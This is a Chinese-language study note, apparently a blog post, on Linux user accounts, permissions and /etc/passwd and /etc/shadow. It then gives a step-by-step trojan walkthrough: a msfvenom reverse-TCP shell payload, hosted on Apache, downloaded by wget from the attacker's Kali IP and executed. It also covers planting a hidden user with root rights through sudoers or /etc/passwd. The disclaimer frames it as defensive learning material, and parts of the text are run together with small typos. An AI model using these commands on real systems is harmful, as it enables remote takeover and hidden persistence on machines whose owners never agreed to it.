Linux用户权限

免责声明本笔记中涉及的攻击手法、漏洞利用、流量分析等技术仅作为网络安全防御、应急响应及合规审计的学习参考严禁用于任何未经授权的网络渗透、数据窃取、系统破坏或其他恶意行为。用户植入新建⽤户useradd -m ⽤户名设置密码passwd ⽤户名前提查看对方是否打开sshservice ssh status(查看是否运行)unname查看系统查看文件文件cat /etc/passwd查看用户信息新建用户uid大于等于1000临时以root权限执⾏指令sudo 具体命令配置sudo权限1.usermod -aG sudu gaga显示在组中2.nano /etc/sudoers 增加⽤户名 ALL(ALL:ALL) ALL设置⽤户root权限nano /etc/passwd影子用户⽤户和组管理⽤户user每个使⽤Linux系统的个体或进程都需要⼀个⽤户账户系统资源访问的最⼩权限单元root⽤户UID0拥有最⾼权限系统⽤户UID 1-999通常⽤于服务进程普通⽤户UID ≥1000⼿动创建的⽤户组group批量管理⽤户权限的集合主组Primary Group⽤户创建⽂件时默认归属组附加组Supplementary Group⽤户可加⼊的额外权限组pscat /etc/shadow存放用户密码的文件用户名加密密码最后一次修改密码的时间最小修改时间的间隔修改密码的间隔ls -l/ll文件类型 所属用户 所属用户组 文件大小 修改时间 文件名字修改文件权限r4 w2 x1更改文件所有者木马入侵检测木马核心概念定义伪装成合法软件、隐蔽运⾏在⽬标设备中⽤于⻓期控制或窃取数据的恶意程序关键区别与向⽇葵等远程⼯具不同⽊⻢具备 “伪装性” 和 “隐蔽性”⽤户不知情危害设备被控制后成为 “⾁鸡”攻击者可随时发送命令执⾏操作攻击流程1.制作木马利用kali的MSF工具msfvenom -p linux/x64/shell/reverse_tcp LHOST攻击机ip(Kali) LPORT9999 -f elf -o shell.elf2.启动控制程序3.植入与启动木马1.把木马程序移动到网站目录mv shell.elf /var/www/html2。启动程序service apache2 start3.下载木马wget http://攻击者ip(Kali)/shell.elf -O shell.elf4.启动木马./shell.elf5.加执行权限chmod x shell.elf因为个人水平有限文中肯定有不少值得商榷和改进的地方。所以想把它分享出来真诚地向大家请教无论是逻辑上的漏洞、观点上的偏差还是行文上的问题都欢迎大家多多指点。期待能在大家的帮助下把内容打磨得更好感谢